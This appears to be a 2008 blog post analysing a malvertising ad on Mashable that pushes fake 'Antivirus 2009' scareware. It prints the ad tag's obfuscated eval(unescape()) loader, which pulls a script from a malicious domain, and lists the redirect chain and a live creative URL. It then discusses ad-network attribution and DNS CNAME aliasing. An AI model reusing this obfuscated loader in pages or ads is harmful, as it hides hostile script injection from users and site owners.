Screenshot:

The popup:

Antivirus 2009 Download Page:

Tamper Data:

Calls:

GET http://www.expedia.com/
GET http://www.prolinar.com/?id=200811181921042
GET http://vernariostar.com/?id=200811181921042
GET http://www.google-analytics.com/ga.js
GET http://www.google-analytics.com/__utm.gif?utmwv[...]
http://vernariostar.com/includes.js
POST http://clicksoverview.com/soft.php?aid=075675&d=1&product=XPA&refer=dc77b3921
GET http://antivirusdefense.com/2009/1/freescan.php?nu=77075675

Code of the Ad tag page:

<html><body style="margin:0; padding:0;">
<a href="http://www.rhapsody.com/?ref=26ta7" target="_blank"><img src="http://www.triesto.com/banners-db/Rhapsody/Rhapsody_728×90_1.jpg" border=0></a>

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));

</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-6195944-3");
pageTracker._trackPageview();
</script>

<script>
var action_URL = "http://clicksoverview.com/soft.php?aid=075675&d=1&product=XPA&refer=dc77b3921";
var target_URL = "http://clicksoverview.com/soft.php?aid=075675&d=1&product=XPA&refer=dc77b3921";
var warn_prod = "";
eval(unescape(’%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%76%65%72%6E%61%72%69%6F%73%74%61%72%2E%63%6F%6D%2F%69%6E%63%6C%75%64%65%73%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B’));

</script>

</body></html>

Greg Yardley thinks that this ad is not served by the Adsense network but instead by Mashable’s internal salesforce and that they are simply using Google’s new AdManager product as their adserving solution. Digging through the tags, it’s unclear whether or not this is the case. The actual creative is hosted on the domain “pagead2.googlesyndication.com” which has traditionally been used to host Adsense creatives and ad tags. Google’s AdManager runs on a different domain — “partner.googleadservices.com” — but it is certainly possible that AdManager and AdSense share the same underlying static content delivery system. (someone from Google care to comment?)

This is an excellent example of the fact that URLs generally don’t provide enough information to identify who is delivering the actual advertisement on the page. In this Mashable/Google page, it is unclear — it could be Mashable’s internal salesforce selling the ad — or there could be some server-side integration between AdManager and Adsense and Adsense is responsible for serving this actual creative. Right Media suffered from many of the same problems — people would always yell at the Right Media Ad-Network whenever a creative hosted at content.yieldmanager.com was causing problems, even though that single domain was shared across 50+ networks.

The solution that we came up with @ RM was to start using DNS CNAME aliases when returning any and all content. A CNAME is a simple DNS record that simply says — “this domain name is an alias for this other domain name”. So for example, the domain “content.cpxinteractive.com” is an alias for “content.yieldmanager.com”. This way, if CPX was responsible for serving a bad ad the offending URL would be “content.cpxinteractive.com/ad.jpg” and not “ad.yieldmanager.com/ad.jpg”. CNAMEs allow central serving systems (eg, AdManager) to both hand out tags and return creative content tagged with an owner while still maintaining the same internal systems.

Screengrab of ad on Mashable:

Source of the ad (warning I would not open this if I were you):
http://pagead2.googlesyndication.com/pagead/imgad?id=CLK8lreVvKyciwEQ2AUYWjIIqyqX6hvFaHc

Screengrab of the ad:

And for the first time in a while (probably because I’m in Moscow!) I actually got the actual trigger, and got this nice popup:

and was redirected to this lovely landing page: